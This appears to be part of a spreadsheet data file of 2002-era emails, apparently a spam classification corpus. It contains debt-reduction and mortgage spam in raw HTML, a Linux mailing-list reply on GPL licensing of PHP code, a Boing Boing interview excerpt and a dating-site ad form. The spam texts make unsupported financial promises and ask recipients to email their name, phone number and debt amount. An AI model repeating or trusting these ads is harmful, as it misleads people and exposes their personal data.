 &lt;CENTER&gt;&lt;table&gt;&lt;tr&gt;&lt;td bgcolor=3DFAFAFA&gt;
 &lt;table width=3D500 cellpadding=3D3 cellspacing=3D3 border=3D0&gt;&lt;tr&gt;
 &lt;td align=3Dcenter&gt;&lt;font face=3Darial color=3Dcc0000 size=3D5&gt;&lt;b&gt;&lt;i&gt;Do You=
  Have $5000 or More in Debt?&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D1=
 00% align=3Dcenter&gt;&lt;font size=3D4 color=3D000033&gt;&lt;b&gt;Now you can "regardles=
 s of your past credit history"&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;FONT size=3D"2" COLOR=3D"003366" FACE=3D"ARIAL,HELVETICA"&gt;=
 &lt;b&gt;
 &lt;font color=3D33000 size=3D2&gt;&amp;#8226;&lt;/font&gt;&amp;nbsp; Cut your monthly payment=
 s by 50% or more!&lt;br&gt;&lt;font color=3D33000 size=3D2&gt;&amp;#8226;&lt;/font&gt;&amp;nbsp; Red=
 uce your credit card debt by up to 60%!&lt;br&gt;&lt;font color=3D33000 size=3D2&gt;&amp;#=
 8226;&lt;/font&gt;&amp;nbsp; Slash your interest rates down to [as low as] zero!&lt;br&gt;=
 &lt;font color=3D33000 size=3D2&gt;&amp;#8226;&lt;/font&gt;&amp;nbsp; Keep More Cash every mon=
 th!&lt;br&gt;&lt;font color=3D33000 size=3D2&gt;&amp;#8226;&lt;/font&gt;&amp;nbsp; Stop creditors fr=
 om harassing you now!&lt;br&gt;&lt;font color=3D33000 size=3D2&gt;&amp;#8226;&lt;/font&gt;&amp;nbsp;=
  Much Much More...&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=3Dc=
 enter&gt;
 &lt;font face=3Darial size=3D2 color=3Dorange&gt;&lt;b&gt;NO OBLIGATION &lt;font color=3D=
 33000 size=3D3&gt;&amp;#8226;&lt;/font&gt; FREE CONSULTATION &lt;font color=3D33000 size=3D=
 3&gt;&amp;#8226;&lt;/font&gt; STRICT PRIVACY&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=3Dcenter&gt;&lt;fo=
 nt face=3Darial size=3D4&gt;&lt;A href=3D"mailto:labrador243@yahoo.com?subject=3D=
 REMEMBER Full Name, Phone Number and AMOUNT OF DEBT" target=3D"_blank"&gt;Cli=
 ck Here and Include Your&lt;BR&gt;Name, Phone Number and Amount of Debt&lt;/a&gt;&lt;/fon=
 t&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
 &lt;BR&gt;&lt;font face=3D"Geneva, Verdana, Helvetica, sans-serif" size=3D1&gt;&lt;A HREF=
 =3D"mailto:jjamRe5@yahoo.com" target=3D"_blank"&gt;Remove from Mailing List&lt;/=
 A&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
 &lt;/div&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;br&gt;
 -_-_-_-_-_-_-_-_
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 09:53:16PM +0100, awhalley@eircom.net wrote:
 &gt; The setup is as follows:
 &gt; I develop a piece of code using PHP 3.0.9 which is, to
 &gt; my knowledge, GPL. 
 PHP is released under the GPL, yes.
 &gt; The piece of code runs on my server and is an integral part of a system
 &gt; that I have developed for a client. I did not recieve payment for this
 &gt; particular piece of code but I did recieve payment for the system. My client
 &gt; now wants to use a different service provider but keep my code.
 &gt; Do I have a right to claim intellectual property rights for my little
 &gt; piece of code that he did not pay me for or do I have to give the client the
 &gt; code under the GPL.
 Exactly what rights you would have to the code depends on the contractual
 arrangement you have with your client, and I'm betting that that's not at
 all cut and dried.
 However, I have been in this situation where a client was using code I
 developed and then decided that he should own the code. Push never came to
 shove (at least, not yet :-) ) but my understanding of the situation vis a
 vis software is that in the absence of any contract granting ownership of
 the code to another party, it remains with the person who wrote it. I didn't
 take legal advice on this but my customer did :-) and his lawyer told him
 that I was right and would most likely win in court.
 So much for the ownership of the code vis a vis you and your client - now for
 the GPL issues. 
 Code compiled by a compiler which is GPL software (e.g. gcc) is not itself
 covered by the GPL unless its author chooses to make it so. This is perhaps
 not made clear enough in the GPL text and is a particular piece of FUD which
 Microsoft loves to toss about. Similarly, the copy of PHP which is part of
 your customer's system is covered by the GPL. You can charge him whatever
 you like for it but you must provide him with acces to the source code, and
 you cannot restrict what he can do with it (in this case, move it to another
 service provider). However, you have not (I take it) chosen to license YOUR
 code under the GPL so the conditions of the GPL do NOT apply to it.
 If OTOH you had written some code which modified PHP as such, and then
 distributed (whether for a fee or not) that modified PHP, then the modified
 code must be licensed under the GPL. But this applies to a modification to
 PHP itself and NOT to your scripts which run under PHP.
 The relevant clause is 2(b) which says (though Lord knows why I'm quoting when
 locate COPYING will turn up a shedload of copies of the GPL on just about
 any Linux box - 540 on this box)
 b) You must cause any work that you distribute or publish, that in whole or
 in part contains or is derived from the Program or any part thereof, to be
 licensed as a whole at no charge to all third parties under the terms of
 this License.
 Your PHP scripts do not contain, nor are they derived from, PHP, in whole or
 in part.
 &gt; I know this is not strictly a 'Linux' issue but any help would be appreciated
 Microsoft has very much made this a Linux issue - it has attempted to imply
 that any company using GPL software must make everything it owns public and
 it must be true - that nice man from Microsoft wouldn't lie, would he ?
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: re. 6.29% Fixed Rate - Free Instant Quote 30127
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;table width=3D"500" align=3D"center"&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;
 &lt;font face=3D"webdings" color=3D"#0000FF" size=3D"7"&gt;
 H
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"6" face=3D"arial" color=3D"#FF0000"&gt;6.29% Fixed Rate!!&lt;/f=
 ont&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;
 &lt;font face=3D"webdings" color=3D"#0000FF" size=3D"7"&gt;
 H
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width=3D"475" align=3D"center"&gt;
 &lt;tr&gt;
 &lt;td align=3D"center"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"arial" size=3D"6" color=3D"#FF0000"&gt;Rates Have Fallen Aga=
 in!!!&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"arial" size=3D"5" color=3D"#0000FF"&gt;DO NOT MISS OUT!!&lt;/fo=
 nt&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"4" face=3D"arial" color=3D"#000000"&gt;LET BANKS COMPETE FOR=
  YOUR
 BUSINESS!!!&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"4" face=3D"arial"&gt;ALL CREDIT WELCOME&lt;/font&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;font size=3D"5" face=3D"arial" color=3D"#0000FF"&gt;
 &lt;a href=3D"http://216.126.184.126/123/mor.htm"&gt;Click Here Now For Details!=
 &lt;/a&gt;
 &lt;/p&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D"center"&gt;
 &lt;font size=3D"2" face=3D"arial" color=3D"#000000"&gt;
 ~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#&lt;br&gt;
 &lt;a href=3D"mailto:goodhrt644@aol.com"&gt;CLICK HERE&lt;/a&gt; to unsubscribe from t=
 his mailing list
 ~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#&lt;br&gt;
 &lt;/p&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/body&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;body&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blog de jeanpoole interviews Mark
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516609
 Date: Not supplied
 Here's a brief interview with me.  
     *Interviewer:* If the Boing Boing zine and blog were TV characters, who'd 
     they be, and how'd they get on? 
     *Mark:* The zine would be Jethro Bodine of "The Beverly Hillbillies" -- 
     curious, neophilic, xenophilic, gleeful, and eager to adopt any new theory 
     or conspiracy as the absolute truth. The Blog would be Sherman from 
     "Peabody's Improbable History" -- a traveler of time and space in search of 
     beauty, truth, and the outre. I think Jethro bOING bOING and Sherman Boing 
     Boing would be great pals. Jethro would invite Sherman's dog, Mr. Peabody, 
     to go raccoon hunting with him, and Sherman would send Jethro 40 years into 
     the future to hang out at the Playboy Mansion.  
 Link[1] Discuss[2]
 [1] http://www.octapod.org/jeanpoole/archives/000203.html#000203
 [2] http://www.quicktopic.com/16/H/kymC9LzuB2bHM
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got plans tonight?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;body bgcolor="#FFFFF" leftmargin="0" topmargin="0"&gt;
 &lt;table width="461" cellpadding="0" cellspacing="0" border="0" background="http://e89.friendfinder.com/banners/ff/ad-images/ff-sm-search-bg_002.jpg"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="326" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="347" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left" valign="top"&gt;
 &lt;!-- begin search table --&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0 width="322"&gt;
 &lt;FORM METHOD=POST ACTION=http://guest.friendfinder.com/cgi-bin/public/memsearch.cgi &gt;
 &lt;input type=hidden name=searchtype value="photo_search"&gt;
 &lt;input type=hidden name=pid value="f36929"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="87" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="40" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="20" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="175" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="110" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-i-am.gif" alt="" width="41" height="12" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="5" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;select name=looking_for_person &gt;&lt;option value="1" selected&gt;Man&lt;/option&gt;&lt;option value="2" &gt;Woman&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="10" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-looking-for.gif" alt="" width="75" height="14" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="5" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;select name=find_sex&gt;&lt;option value="1" &gt;a Man&lt;/option&gt;&lt;option value="2" selected&gt;a Woman&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="10" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-between-ages.gif" alt="" width="137" height="14" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="5" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type="text" size="2" name="min_age" value="18" maxlength="2"&gt;&lt;/td&gt;
 &lt;td align="center" valign="middle"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-and..gif" alt="" width="11" height="12" border="0"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type="text" size="2" name="max_age" value="35" maxlength="2"&gt;
 &lt;/td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="10" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-state.gif" alt="" width="121" height="12" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="5" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;select name=state &gt;
 &lt;option value='*'&gt;Any
 &lt;option value="Alaska" &gt; Alaska
 &lt;option value="Alabama" &gt; Alabama
 &lt;option value="Arkansas" &gt; Arkansas
 &lt;option value="Arizona" &gt; Arizona
 &lt;option value="California" &gt; California
 &lt;option value="Colorado" &gt; Colorado
 &lt;option value="Connecticut" &gt; Connecticut
 &lt;option value="District of Columbia" &gt; D.C.
 &lt;option value="Delaware" &gt; Delaware
 &lt;option value="Florida" &gt; Florida
 &lt;option value="Georgia" &gt; Georgia
 &lt;option value="Guam" &gt; Guam
 &lt;option value="Hawaii" &gt; Hawaii
 &lt;option value="Iowa" &gt; Iowa
 &lt;option value="Idaho" &gt; Idaho
 &lt;option value="Illinois" &gt; Illinois
 &lt;option value="Indiana" &gt; Indiana
 &lt;option value="Kansas" &gt; Kansas
 &lt;option value="Kentucky" &gt; Kentucky
 &lt;option value="Louisiana" &gt; Louisiana
 &lt;option value="Massachusetts" &gt; Massachusetts
 &lt;option value="Maryland" &gt; Maryland
 &lt;option value="Maine" &gt; Maine
 &lt;option value="Michigan" &gt; Michigan
 &lt;option value="Minnesota" &gt; Minnesota
 &lt;option value="Missouri" &gt; Missouri
 &lt;option value="Mississippi" &gt; Mississippi
 &lt;option value="Montana" &gt; Montana
 &lt;option value="North Carolina" &gt; North Carolina
 &lt;option value="North Dakota" &gt; North Dakota
 &lt;option value="Nebraska" &gt; Nebraska
 &lt;option value="New Hampshire" &gt; New Hampshire
 &lt;option value="New Jersey" &gt; New Jersey
 &lt;option value="New Mexico" &gt; New Mexico
 &lt;option value="Nevada" &gt; Nevada
 &lt;option value="New York" &gt; New York
 &lt;option value="Ohio" &gt; Ohio
 &lt;option value="Oklahoma" &gt; Oklahoma
 &lt;option value="Oregon" &gt; Oregon
 &lt;option value="Pennsylvania" &gt; Pennsylvania
 &lt;option value="Puerto Rico" &gt; Puerto Rico
 &lt;option value="Rhode Island" &gt; Rhode Island
 &lt;option value="South Carolina" &gt; South Carolina
 &lt;option value="South Dakota" &gt; South Dakota
 &lt;option value="Tennessee" &gt; Tennessee
 &lt;option value="Texas" &gt; Texas
 &lt;option value="Utah" &gt; Utah
 &lt;option value="Virginia" &gt; Virginia
 &lt;option value="The Virgin Islands" &gt; The Virgin Islands
 &lt;option value="Vermont" &gt; Vermont
 &lt;option value="Washington" &gt; Washington
 &lt;option value="Wisconsin" &gt; Wisconsin
 &lt;option value="West Virginia" &gt; West Virginia
 &lt;option value="Wyoming" &gt; Wyoming
 &lt;option value='*'&gt; ---------
 &lt;option value="Alberta" &gt; Alberta
 &lt;option value="British Columbia" &gt; British Columbia
 &lt;option value="Manitoba" &gt; Manitoba
 &lt;option value="New Brunswick" &gt; New Brunswick
 &lt;option value="Newfoundland" &gt; Newfoundland
 &lt;option value="Northwest Territories" &gt; Northwest Territories
 &lt;option value="Nova Scotia" &gt; Nova Scotia
 &lt;option value="Ontario" &gt; Ontario
 &lt;option value="Prince Edward Island" &gt; Prince Edward Island
 &lt;option value="Quebec" &gt; Quebec
 &lt;option value="Saskatchewan" &gt; Saskatchewan
 &lt;option value="Yukon Territory" &gt; Yukon Territory
 &lt;option value='*'&gt; ---------
 &lt;option value="New South Wales" &gt; New South Wales
 &lt;option value="Queensland" &gt; Queensland
 &lt;option value="South Australia" &gt; South Australia
 &lt;option value="Tasmania" &gt; Tasmania
 &lt;option value="Victoria" &gt; Victoria
 &lt;option value="Western Australia" &gt; Western Australia
 &lt;/select&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="10" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-country.gif" alt="" width="53" height="14" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="5" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;select name=country &gt;
 &lt;option value="United States" &gt;United States
 &lt;option value="Afghanistan" &gt; Afghanistan
 &lt;option value="Albania" &gt; Albania
 &lt;option value="Algeria" &gt; Algeria
 &lt;option value="Andorra" &gt; Andorra
 &lt;option value="Angola" &gt; Angola
 &lt;option value="Antigua" &gt; Antigua
 &lt;option value="Argentina" &gt; Argentina
 &lt;option value="Armenia" &gt; Armenia
 &lt;option value="Aruba" &gt; Aruba
 &lt;option value="Australia" &gt; Australia
 &lt;option value="Austria" &gt; Austria
 &lt;option value="Azerbaidjan" &gt; Azerbaidjan
 &lt;option value="Bahamas" &gt; Bahamas
 &lt;option value="Bahrain" &gt; Bahrain
 &lt;option value="Bangladesh" &gt; Bangladesh
 &lt;option value="Barbados" &gt; Barbados
 &lt;option value="Belgium" &gt; Belgium
 &lt;option value="Belize" &gt; Belize
 &lt;option value="Benin" &gt; Benin
 &lt;option value="Bermuda" &gt; Bermuda
 &lt;option value="Bhutan" &gt; Bhutan
 &lt;option value="Bolivia" &gt; Bolivia
 &lt;option value="Bosnia" &gt; Bosnia
 &lt;option value="Botswana" &gt; Botswana
 &lt;option value="Brazil" &gt; Brazil
 &lt;option value="Brunei" &gt; Brunei
 &lt;option value="Bulgaria" &gt; Bulgaria
 &lt;option value="Burkina Faso" &gt; Burkina Faso
 &lt;option value="Burma" &gt; Burma
 &lt;option value="Burundi" &gt; Burundi
 &lt;option value="Cambodia" &gt; Cambodia
 &lt;option value="Cameroon" &gt; Cameroon
 &lt;option value="Canada" &gt; Canada
 &lt;option value="Cape Verde" &gt; Cape Verde
 &lt;option value="Central African Republic" &gt; Central Afr. Rep.
 &lt;option value="Chad" &gt; Chad
 &lt;option value="Chile" &gt; Chile
 &lt;option value="China" &gt; China
 &lt;option value="Colombia" &gt; Colombia
 &lt;option value="Comoros" &gt; Comoros
 &lt;option value="Congo" &gt; Congo
 &lt;option value="Congo (Zaire)" &gt; Congo (Zaire)
 &lt;option value="Costa Rica" &gt; Costa Rica
 &lt;option value="Croatia" &gt; Croatia
 &lt;option value="Cuba" &gt; Cuba
 &lt;option value="Cyprus" &gt; Cyprus
 &lt;option value="Czech Republic" &gt; Czech Republic
 &lt;option value="Denmark" &gt; Denmark
 &lt;option value="Djibouti" &gt; Djibouti
 &lt;option value="Dominica" &gt; Dominica
 &lt;option value="Dominican Republic" &gt; Dom. Republic
 &lt;option value="Ecuador" &gt; Ecuador
 &lt;option value="Egypt" &gt; Egypt
 &lt;option value="El Salvador" &gt; El Salvador
 &lt;option value="Equatorial Guinea" &gt; Equatorial Guinea
 &lt;option value="Eritrea" &gt; Eritrea
 &lt;option value="Estonia" &gt; Estonia
 &lt;option value="Ethiopia" &gt; Ethiopia
 &lt;option value="Fiji" &gt; Fiji
 &lt;option value="Finland" &gt; Finland
 &lt;option value="France" &gt; France
 &lt;option value="Gabon" &gt; Gabon
 &lt;option value="Gambia" &gt; Gambia
 &lt;option value="Georgia" &gt; Georgia
 &lt;option value="Germany" &gt; Germany
 &lt;option value="Ghana" &gt; Ghana
 &lt;option value="Gibraltar" &gt; Gibraltar
 &lt;option value="Greece" &gt; Greece
 &lt;option value="Guam" &gt; Guam
 &lt;option value="Guatemala" &gt; Guatemala
 &lt;option value="Guinea" &gt; Guinea
 &lt;option value="Guinea-Bissau" &gt; Guinea-Bissau
 &lt;option value="Guyana" &gt; Guyana
 &lt;option value="Haiti" &gt; Haiti
 &lt;option value="Honduras" &gt; Honduras
 &lt;option value="Hong Kong" &gt; Hong Kong
 &lt;option value="Hungary" &gt; Hungary
 &lt;option value="Iceland" &gt; Iceland
 &lt;option value="India" &gt; India
 &lt;option value="Indonesia" &gt; Indonesia
 &lt;option value="Iran" &gt; Iran
 &lt;option value="Iraq" &gt; Iraq
 &lt;option value="Ireland" &gt; Ireland
 &lt;option value="Israel" &gt; Israel
 &lt;option value="Italy" &gt; Italy
 &lt;option value="Ivory Coast" &gt; Ivory Coast
 &lt;option value="Jamaica" &gt; Jamaica
 &lt;option value="Japan" &gt; Japan
 &lt;option value="Jordan" &gt; Jordan
 &lt;option value="Kazakhstan" &gt; Kazakhstan
 &lt;option value="Kenya" &gt; Kenya
 &lt;option value="Kuwait" &gt; Kuwait
 &lt;option value="Laos" &gt; Laos
 &lt;option value="Latvia" &gt; Latvia
 &lt;option value="Lebanon" &gt; Lebanon
 &lt;option value="Liberia" &gt; Liberia
 &lt;option value="Libya" &gt; Libya
 &lt;option value="Liechtenstein" &gt; Liechtenstein
 &lt;option value="Lithuania" &gt; Lithuania
 &lt;option value="Luxembourg" &gt; Luxembourg
 &lt;option value="Macau" &gt; Macau
 &lt;option value="Macedonia" &gt; Macedonia
 &lt;option value="Madagascar" &gt; Madagascar
 &lt;option value="Malawi" &gt; Malawi
 &lt;option value="Malaysia" &gt; Malaysia
 &lt;option value="Maldives" &gt; Maldives
 &lt;option value="Mali" &gt; Mali
 &lt;option value="Malta" &gt; Malta
 &lt;option value="Mauritania" &gt; Mauritania
 &lt;option value="Mauritius" &gt; Mauritius
 &lt;option value="Mexico" &gt; Mexico
 &lt;option value="Moldova" &gt; Moldova
 &lt;option value="Monaco" &gt; Monaco
 &lt;option value="Mongolia" &gt; Mongolia
 &lt;option value="Morocco" &gt; Morocco
 &lt;option value="Mozambique" &gt; Mozambique
 &lt;option value="Namibia" &gt; Namibia
 &lt;option value="Nepal" &gt; Nepal
 &lt;option value="Netherlands" &gt; Netherlands
 &lt;option value="New Zealand" &gt; New Zealand
 &lt;option value="Nicaragua" &gt; Nicaragua
 &lt;option value="Niger" &gt; Niger
 &lt;option value="Nigeria" &gt; Nigeria
 &lt;option value="North Korea" &gt; North Korea
 &lt;option value="Norway" &gt; Norway
 &lt;option value="Oman" &gt; Oman
 &lt;option value="Pakistan" &gt; Pakistan
 &lt;option value="Panama" &gt; Panama
 &lt;option value="Paraguay" &gt; Paraguay
 &lt;option value="Peru" &gt; Peru
 &lt;option value="Philippines" &gt; Philippines
 &lt;option value="Poland" &gt; Poland
 &lt;option value="Portugal" &gt; Portugal
 &lt;option value="Puerto Rico" &gt; Puerto Rico
 &lt;option value="Qatar" &gt; Qatar
 &lt;option value="Romania" &gt; Romania
 &lt;option value="Russia" &gt; Russia
